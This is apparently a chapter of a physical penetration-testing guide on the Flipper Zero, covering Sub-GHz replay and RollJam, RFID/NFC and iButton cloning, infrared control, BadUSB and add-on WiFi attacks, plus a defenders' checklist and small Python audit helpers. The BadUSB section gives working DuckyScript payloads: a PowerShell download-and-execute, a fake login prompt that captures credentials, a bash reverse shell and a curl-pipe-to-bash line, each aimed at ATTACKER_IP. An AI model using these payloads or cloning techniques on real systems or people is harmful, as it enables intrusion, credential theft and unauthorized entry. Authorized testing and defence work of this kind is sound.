Flipper Zero & RF Ops
The Flipper Zero is the Swiss Army knife of physical security assessments — Sub-GHz radio, RFID/NFC, infrared, GPIO, and BadUSB packaged for pocket carry. This chapter covers the complete operator workflow: firmware selection, signal capture, credential cloning, and assessment integration.
Legal Notice
Firmware Options
Custom firmware extends Flipper Zero capabilities significantly. Choose based on your needs:
| Firmware | Features | Best For |
|---|---|---|
| Official | Stable, legal frequencies only | Beginners, compliance |
| Unleashed | Unlocked frequencies, extra apps | Security researchers |
| RogueMaster | Most apps, animations, unlocked | Maximum functionality |
| Xtreme | Customization, asset packs | Customization enthusiasts |
# Install qFlipper (official desktop app)
# Download from: https://flipperzero.one/update
# Update via qFlipper
# Connect Flipper > Click "Update" > Select firmware
# Install custom firmware via qFlipper
# 1. Download .tgz firmware file
# 2. qFlipper > Install from file > Select .tgz
# Useful firmware repositories
https://github.com/DarkFlippers/unleashed-firmware
https://github.com/RogueMaster/flipperzero-firmware-wPlugins
https://github.com/Flipper-XFW/Xtreme-Firmware
Sub-GHz Radio Attacks
The Sub-GHz module can capture, analyze, and replay radio signals from 300-928 MHz. Common targets include garage doors, gates, car key fobs, and wireless sensors.
Signal Capture & Replay
# Sub-GHz Menu Navigation
Main Menu > Sub-GHz > Read
# Capture unknown signals (RAW mode)
Sub-GHz > Read RAW
# Press button on target remote
# Save captured signal
# Replay captured signal
Sub-GHz > Saved > [signal_name] > Send
# Frequency Analyzer (find active frequency)
Sub-GHz > Frequency Analyzer
# Useful range: 300-928 MHz
# Common frequencies:
# 315 MHz - North America (garage, car fobs)
# 433.92 MHz - Europe/Asia (remotes, sensors)
# 868 MHz - Europe (smart home, alarms)
# 915 MHz - North America (LoRa, smart meters)
# Add custom frequencies
# Edit: SD Card/subghz/assets/setting_user
Rolling Code Analysis
Rolling Codes
# Static vs Rolling Codes
# Static: Same code every time (older systems) - Easy to clone
# Rolling: Code changes each transmission - Requires advanced attacks
# Identifying code type
Sub-GHz > Read > Capture multiple presses
# If codes are identical = Static (vulnerable)
# If codes change = Rolling (protected)
# Common static code protocols (vulnerable)
- Princeton
- CAME 12/24 bit
- Linear
- Nice FLO
- Gate TX
# Rolling code protocols (protected)
- Keeloq (most garage doors)
- CAME Atomo
- Nice Flor-S
- Starline
# RollJam Attack (requires additional hardware)
# 1. Jam target frequency while capturing
# 2. Victim presses button - you capture, they fail
# 3. Victim presses again - you capture second code
# 4. Release jam, replay first code
# 5. You now have one valid unused code
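The "capture multiple presses and compare" check from the Signal Capture and Rolling Codes sections, made repeatable over saved captures, as an added example (not the page's or Flipper's own code): it parses a handful of Sub-GHz key files and reports, per remote, whether the decoded Key changed between presses. The `.sub` header layout and the protocol names are assumed from Flipper's own saved files; the captures are constructed.

```python
"""Triage saved Flipper Zero Sub-GHz key files: does the code change between presses?"""
from collections import defaultdict

def sub_key_file(protocol, key_hex, freq=433920000, bits=24):
    """Build a constructed .sub key file (header layout assumed from Flipper's own saves)."""
    return (f"Filetype: Flipper SubGhz Key File\nVersion: 1\nFrequency: {freq}\n"
            f"Preset: FuriHalSubGhzPresetOok650Async\nProtocol: {protocol}\n"
            f"Bit: {bits}\nKey: {key_hex}\n")

# Constructed captures: three presses of one Princeton remote, two presses of one
# KeeLoq fob, a single Nice FLO press, and one RAW recording with no decoded key.
SAMPLE_CAPTURES = [
    sub_key_file("Princeton", "00 00 00 00 00 8B 4C 3E"),
    sub_key_file("Princeton", "00 00 00 00 00 8B 4C 3E"),
    sub_key_file("Princeton", "00 00 00 00 00 8B 4C 3E"),
    sub_key_file("KeeLoq", "1F 3A 9C 02 5E 77 0B 41", bits=64),
    sub_key_file("KeeLoq", "8D 10 C4 6B 5E 77 0B 41", bits=64),
    sub_key_file("Nice FLO", "00 00 00 00 00 00 0A 5C", bits=12),
    "Filetype: Flipper SubGhz RAW File\nVersion: 1\nFrequency: 433920000\nRAW_Data: 312 -510 298\n",
]

def parse_sub_file(text):
    """Read the 'Name: value' header lines of a .sub file into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith("#"):
            name, value = line.split(":", 1)
            fields[name.strip()] = value.strip()
    return fields

def classify_captures(captures):
    """Group key files by (protocol, frequency) and judge each remote from its presses:
    an unchanging Key is a static code, a Key that differs per press is a rolling code."""
    groups = defaultdict(list)
    for text in captures:
        f = parse_sub_file(text)
        if f.get("Filetype") != "Flipper SubGhz Key File":
            continue  # RAW recordings carry no decoded Key to compare
        groups[(f["Protocol"], int(f["Frequency"]))].append(f["Key"].replace(" ", "").upper())
    report = {}
    for ident, keys in groups.items():
        distinct = len(set(keys))
        if len(keys) < 2:
            verdict = "undetermined: capture at least two presses"
        elif distinct == 1:
            verdict = "static code: high risk, a recording replays"
        else:
            verdict = "rolling code: protected against plain replay"
        report[ident] = {"presses": len(keys), "distinct": distinct, "verdict": verdict}
    return report

if __name__ == "__main__":
    for (proto, freq), r in classify_captures(SAMPLE_CAPTURES).items():
        print(f"{proto} @ {freq / 1e6:.3f} MHz: {r['presses']} presses, {r['distinct']} distinct -> {r['verdict']}")
```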
RFID/NFC Attacks
125 kHz (Low Frequency)
# Read LF cards (125 kHz)
Main Menu > 125 kHz RFID > Read
# Common 125 kHz card types:
# - EM4100 (EM-Marin) - Most common, easy to clone
# - HID Prox - Corporate access cards
# - Indala - Government/secure facilities
# - AWID - Access control systems
# Clone to T5577 card
125 kHz RFID > Saved > [card] > Write
# Emulate card (be the badge)
125 kHz RFID > Saved > [card] > Emulate
# Add manually if you know the ID
125 kHz RFID > Add Manually > [Select type]
# Enter Facility Code + Card Number
# Brute force (if you know partial info)
125 kHz RFID > Extra Actions > [protocol] Brute Force
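For "Add Manually" and for documenting FC/CN as report evidence, the number pair and the 26-bit frame are two views of the same HID Prox credential. This added example (not the page's or Flipper's code) packs a facility code and card number into the public H10301 26-bit layout, checks both parity bits and decodes the frame back; the sample values are constructed.

```python
"""HID H10301 (26-bit) codec: facility code + card number <-> the raw frame a reader sees."""

def _ones(value: int) -> int:
    """Number of set bits."""
    return bin(value).count("1")

def encode_h10301(facility_code: int, card_number: int) -> int:
    """Pack FC (8 bits) and CN (16 bits) into the 26-bit H10301 frame
    [even parity][FC 8][CN 16][odd parity]; each parity bit covers the 12 data bits next to it."""
    if not 0 <= facility_code < 256 or not 0 <= card_number < 65536:
        raise ValueError("FC must fit in 8 bits and CN in 16 bits")
    body = (facility_code << 16) | card_number        # the 24 payload bits
    even = _ones(body >> 12) & 1                      # set so bits 25..13 hold an even count
    odd = 1 - (_ones(body & 0xFFF) & 1)               # set so bits 12..0 hold an odd count
    return (even << 25) | (body << 1) | odd

def parity_ok(raw: int) -> bool:
    """True when both parity bits of a 26-bit frame check out; a bad read or an altered bit fails."""
    left = raw >> 13         # even-parity bit plus the 12 high data bits
    right = raw & 0x1FFF     # the 12 low data bits plus the odd-parity bit
    return _ones(left) % 2 == 0 and _ones(right) % 2 == 1

def decode_h10301(raw: int):
    """Recover (FC, CN) from a raw frame, refusing anything wider than 26 bits or with bad parity."""
    if raw >> 26 or not parity_ok(raw):
        raise ValueError(f"not a valid H10301 frame: {raw:#09x}")
    body = (raw >> 1) & 0xFFFFFF
    return body >> 16, body & 0xFFFF

def describe(raw: int) -> str:
    """One evidence line for the report: the 26 raw bits plus the decoded FC/CN."""
    fc, cn = decode_h10301(raw)
    return f"H10301 raw={raw:026b} FC={fc} CN={cn}"

if __name__ == "__main__":
    frame = encode_h10301(123, 45678)        # constructed sample credential
    print(describe(frame))
    print("one flipped bit still passes parity?", parity_ok(frame ^ 1))
```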
13.56 MHz (High Frequency NFC)
# Read NFC cards
Main Menu > NFC > Read
# Common NFC card types:
# - MIFARE Classic (1K/4K) - Transit, access (weak crypto)
# - MIFARE Ultralight - Event tickets, transit
# - MIFARE DESFire - High security access
# - NTAG21x - NFC tags, smart posters
# - iCLASS - HID high security
# MIFARE Classic attacks
NFC > Read > [Detect card]
# Flipper attempts automatic key recovery
# Uses dictionary attack + hardnested attack
# Save and emulate
NFC > Saved > [card] > Emulate
# Extract keys (if attack succeeds)
# Keys saved in .nfc file on SD card
# Write to Magic MIFARE card (Gen1a/Gen2)
NFC > Saved > [card] > Write
# Manual key entry
# Edit .nfc file to add known keys
# Common default keys:
# FFFFFFFFFFFF (factory default)
# A0A1A2A3A4A5 (MAD key)
# D3F7D3F7D3F7 (NFC Forum)
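The default-key list above and the "MIFARE Classic cards with factory-default keys" high-risk signal in the defenders section come down to one audit: does any sector trailer in a dump still use FFFFFFFFFFFF, A0A1A2A3A4A5 or D3F7D3F7D3F7? This added example (not the page's or Flipper's code) runs that audit over a constructed Flipper `.nfc` dump; the file layout, including `??` for unread bytes and the 1K/4K trailer positions, is assumed from Flipper's own dumps.

```python
"""Audit Flipper Zero .nfc dumps of MIFARE Classic cards for factory-default sector keys."""
import re
# Default keys listed on the page; in each sector trailer key A is bytes 0-5 and key B bytes 10-15.
DEFAULT_KEYS = {"FFFFFFFFFFFF": "factory default", "A0A1A2A3A4A5": "MAD key", "D3F7D3F7D3F7": "NFC Forum"}
# Constructed dump in the layout of a Flipper .nfc file (layout assumed from Flipper's own dumps);
# '??' marks bytes that stayed unread because the key for that sector was never recovered.
SAMPLE_DUMP = """\
Filetype: Flipper NFC device
UID: 11 22 33 44
Mifare Classic type: 1K
Block 3: FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF
Block 7: A0 A1 A2 A3 A4 A5 78 77 88 C1 4B 0B 20 10 7C CC
Block 11: ?? ?? ?? ?? ?? ?? 78 77 88 C1 FF FF FF FF FF FF
Block 15: 4B 0B 20 10 7C CC 78 77 88 C1 D3 F7 D3 F7 D3 F7
"""

def trailer_blocks(card_type: str):
    """Sector-trailer block numbers: 16 sectors of 4 blocks on a 1K card; a 4K card has 32 of them plus 8 sectors of 16 blocks from block 128."""
    trailers = [4 * s + 3 for s in range(32 if card_type == "4K" else 16)]
    if card_type == "4K":
        trailers += [128 + 16 * s + 15 for s in range(8)]
    return trailers

def parse_nfc_dump(text: str):
    """Split a dump into header fields and {block: [byte or None]} (None for '??')."""
    info, blocks = {}, {}
    for line in text.splitlines():
        m = re.match(r"^Block (\d+):\s*(.*)$", line)
        if m:
            blocks[int(m.group(1))] = [None if b == "??" else int(b, 16) for b in m.group(2).split()]
        elif ":" in line:
            name, value = line.split(":", 1)
            info[name.strip()] = value.strip()
    return info, blocks

def audit_default_keys(text: str):
    """Return (sector, 'A' or 'B', key_hex, label) for every readable trailer key that is a default."""
    info, blocks = parse_nfc_dump(text)
    findings = []
    for sector, block_no in enumerate(trailer_blocks(info.get("Mifare Classic type", "1K"))):
        data = blocks.get(block_no, [])
        if len(data) != 16:
            continue  # trailer not in the dump
        for slot, span in (("A", data[0:6]), ("B", data[10:16])):
            if None in span:
                continue  # key never recovered, so nothing to judge
            key = "".join(f"{b:02X}" for b in span)
            if key in DEFAULT_KEYS:
                findings.append((sector, slot, key, DEFAULT_KEYS[key]))
    return findings
```

Run it over every dump collected during an engagement: each finding is a sector whose contents any reader with the default key can read, and the card is a candidate for the high-risk list in the report.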
Infrared Attacks
# Infrared capabilities
Main Menu > Infrared
# Universal Remotes (built-in)
Infrared > Universal Remotes
# TVs, ACs, Projectors, Audio systems
# Useful for: conference room takeover, TV-B-Gone
# Learn new remote
Infrared > Learn New Remote
# Point remote at Flipper, press buttons
# Save each button with descriptive name
# Brute force TV codes
Infrared > Universal Remotes > TVs
# Cycles through known power codes
# Useful for turning off public displays
# Custom IR files
# Download IR databases:
# https://github.com/logickworkshop/Flipper-IRDB
# Copy to: SD Card/infrared/
# IR Blaster range
# Built-in: ~3 meters
# With IR blaster module: 15+ meters
BadUSB Attacks
BadUSB turns the Flipper into a malicious keyboard that types pre-programmed payloads. It uses DuckyScript syntax compatible with the USB Rubber Ducky.
# BadUSB location
Main Menu > Bad USB
# Payload location on SD card
SD Card/badusb/
# Basic DuckyScript syntax
DELAY 1000 # Wait 1 second (ms)
STRING Hello World # Type text
ENTER # Press Enter
GUI r # Windows+R (Run dialog)
ALT F4 # Close window
CTRL ALT DELETE # Ctrl+Alt+Del
# Windows reverse shell payload
REM Open PowerShell and download/execute payload
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')
ENTER
# Windows credential harvester
REM Fake Windows login prompt
DELAY 1000
GUI r
DELAY 300
STRING powershell -w hidden -ep bypass
ENTER
DELAY 500
STRING Add-Type -AssemblyName System.Windows.Forms;$c=[System.Windows.Forms.MessageBox]::Show('Your session has expired. Please re-enter your credentials.','Windows Security',4);$cred=Get-Credential;$cred.GetNetworkCredential()|fl *|Out-File $env:TEMPcreds.txt
ENTER
# Linux reverse shell
DELAY 1000
CTRL ALT t
DELAY 500
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
ENTER
# Mac payload
DELAY 1000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 500
STRING curl http://ATTACKER_IP/payload.sh | bash
ENTER
GPIO & Hardware
# GPIO Pin capabilities
Main Menu > GPIO
# Connect external modules:
# - WiFi Devboard (ESP32) - WiFi attacks, deauth
# - CC1101 module - Extended Sub-GHz range
# - NRF24 module - 2.4GHz attacks (MouseJack)
# - Proxmark3 - Advanced RFID (via UART)
# WiFi Devboard attacks (with Marauder firmware)
# - Beacon spam
# - Deauthentication
# - Probe request sniffing
# - Evil portal
# - Packet capture
# UART Bridge (connect to devices)
GPIO > USB-UART Bridge
# Useful for:
# - Router console access
# - IoT device debugging
# - Embedded system hacking
# GPIO pinout (directly usable)
# 3.3V, 5V, GND, TX, RX, and more
# Read sensors, control devices
iButton / 1-Wire
# iButton (Dallas keys / 1-Wire)
Main Menu > iButton
# Common uses:
# - Building access
# - Elevator control
# - Time clocks
# - Guard tour systems
# Read iButton
iButton > Read
# Touch key to Flipper's iButton contacts
# Common iButton types:
# - DS1990A (ROM only) - Easy to clone
# - DS1982 (EEPROM) - Stores data
# - DS1961S (SHA-1) - Cryptographic
# Clone to RW1990 blank
iButton > Saved > [key] > Write
# Requires RW1990 writable key
# Emulate
iButton > Saved > [key] > Emulate
# Hold Flipper to reader
Useful Apps & Resources
# Essential Flipper apps (install via qFlipper or web)
- Marauder (WiFi attacks - requires devboard)
- DTMF Dolphin (phone tones)
- Barcode Generator
- QR Code
- GPS (with module)
- Geiger Counter (with module)
# SD Card structure for assets
SD Card/
├── badusb/ # DuckyScript payloads
├── infrared/ # IR remote files
├── nfc/ # NFC card dumps
├── subghz/ # Sub-GHz captures
├── lfrfid/ # 125kHz card data
├── ibutton/ # iButton dumps
└── apps_data/ # App-specific data
# Useful databases
https://github.com/UberGuidoZ/Flipper # Massive collection
https://github.com/logickworkshop/Flipper-IRDB # IR remotes
https://github.com/Gioman101/FlipperAmi # Amiibo collection
# Update databases
# Download repos, copy relevant folders to SD card
# Discord communities
Flipper Devices (Official)
Flipper Zero Unofficial
Physical Pentest Workflow
- Reconnaissance - Identify target access control systems (card type, frequency, brand)
- Frequency Analysis - Use Sub-GHz analyzer to find active frequencies
- Badge Cloning - Read employee badges via proximity (in elevator, cafeteria)
- Signal Capture - Capture garage/gate signals if applicable
- IR Capture - Learn conference room AV controls
- Payload Prep - Prepare BadUSB payloads for target OS
- Execution - Use captured credentials and payloads during engagement
- Documentation - Screenshot/photo all successful attacks for report
Operator Tips
- Keep firmware updated for latest protocol support
- Carry spare T5577 and Magic MIFARE cards
- Test payloads in lab before engagement
- Document card UID/FC/CN for report evidence
- Use airplane mode when not actively testing to conserve battery
What Strong Defenders Do Differently
Defensive Signals
- DESFire EV2/EV3 or SEOS credentials that resist cloning
- OSDP Secure Channel readers with encrypted back-haul
- Rolling-code garage and gate systems (KeeLoq, CAME Atomo)
- USB port Group Policy blocking BadUSB execution
- RF monitoring / WIDS that detects rogue Sub-GHz devices
High-Risk Signals
- EM4100 or HID 125 kHz Prox still deployed on perimeter doors
- Static-code garage remotes that replay instantly
- MIFARE Classic cards with factory-default keys
- No USB device-control policy on shared workstations
- IR-controlled AV gear in unsupervised conference rooms
🛠️ Recommended Tools
Flipper Zero
The essential multi-tool for physical pentesting — Sub-GHz, NFC/RFID, IR, BadUSB, iButton, and GPIO in one pocket-sized device.
HackRF One
Wideband SDR (1 MHz – 6 GHz) for deep RF analysis, spectrum monitoring, and signal replay beyond Flipper's Sub-GHz range.